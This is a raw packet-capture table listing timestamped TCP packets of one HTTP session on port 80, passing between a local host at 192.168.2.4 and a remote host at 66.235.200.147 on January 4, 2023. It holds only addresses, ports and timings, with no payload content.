Jan 4, 2023 16:47:38.253350973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.253406048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.253453970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.253501892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.253501892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.253551960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.253555059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.253602982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.253659010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.254266024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.254321098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.254369020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.254416943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.254465103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.254569054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.254569054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.254569054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.254569054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.254569054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.255176067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.255229950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.255279064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.255281925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.255314112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.255328894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.255346060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.255378008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.255398989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.255448103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.256114960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.256150007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.256170034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.256190062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.256210089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.256793022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.257101059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.257133961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.257163048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.257193089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.257193089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.257225990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.257231951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.257267952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.257304907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.257977009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.258073092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.258182049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.258217096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.258244991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.258249998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.258275986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.258290052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.258330107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.258888960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.258922100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.258989096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.259020090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.259025097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.259051085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.259061098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.259088039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.259110928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.259831905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.259905100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.259923935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.259955883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.259973049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.259987116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.260003090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.260016918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.260039091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.260068893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.260801077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.260835886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.260864973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.260881901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.260886908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.260907888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.261225939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.261678934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.261713982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.261743069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.261750937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.261787891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.262001991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.262032986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.262062073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.262095928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.262662888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.262780905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.262844086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.262876034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.262900114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.262907028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.262938976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.262952089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.262958050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.263004065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.263570070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.263608932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.263638020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.263643980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.263684034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.263942003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.263978004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.264034986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.264034986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.264480114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.264533043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.264549017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.264564991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.264594078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.264616013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.264719009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.264751911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.264779091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.264810085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.265592098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.265619040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.265638113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.265657902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.265676975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.265912056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.266299963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.266405106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.266424894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.266443968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.266444921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.266467094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.266493082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.266524076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.267247915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.267275095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.267294884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.267314911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.267317057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.267335892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.267364025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.267395020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.268325090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.268352032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.268372059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.268392086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.268410921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.268434048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.268475056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.269087076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.269110918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.269130945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.269150019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.269167900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.269172907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.269211054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.269282103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.270071030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.270098925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.270121098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.270140886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.270162106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.270195961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.270195961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.270217896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.270900965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.270925999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.270967960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.271008015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.271032095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.271054029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.271075964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.271085024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.271135092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.271778107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.271805048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.271825075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.271833897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.271845102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.271853924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.271887064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.271903992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.271934986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.272535086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.272559881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.272595882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.272602081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.272618055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.272639036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.272646904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.272681952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.272713900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.273983002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274010897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274029970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274050951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274070978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274077892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.274091959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274112940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.274115086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274142027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.274161100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.274426937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274449110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.274460077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.277282000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.399281979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399383068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399432898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399482965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399533987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399583101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.399583101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.399583101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.399599075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399648905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399698019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399701118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.399744034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399794102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399842978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399888992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399910927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.399934053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399980068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.399991989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400027990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400032997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400075912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400100946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400121927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400162935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400171995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400230885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400247097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400293112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400310993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400340080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400376081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400386095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400412083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400434017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400460005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400481939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400501966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400528908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400541067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400574923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400616884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400620937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400667906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400686979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400715113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400751114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400762081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400810003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400810003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400851011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400860071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400890112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400907040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400927067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.400954962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.400969028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401001930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401041031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401048899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401096106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401113033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401143074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401180983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401190996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401240110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401242971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401281118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401287079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401319027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401379108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401398897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401426077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401465893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401472092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401506901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401519060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401539087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401566982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401582956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401613951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401621103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401663065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401696920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401706934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401753902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401755095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401793957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401802063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401839018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401844025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401870012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401890993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.401913881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401954889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.401968956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402015924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402036905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402060986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402097940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402107954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402132988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402154922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402182102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402215004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402225971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402260065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402301073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402306080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402353048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402360916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402398109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402399063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402440071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402448893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402475119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402496099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402522087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402544022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402568102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402592897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402607918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402681112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402771950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402822971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402870893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402919054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.402941942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.402966022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403003931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403011084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403045893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403060913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403106928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403124094 CET	49696	80	192.168.2.4	66.235.200.147
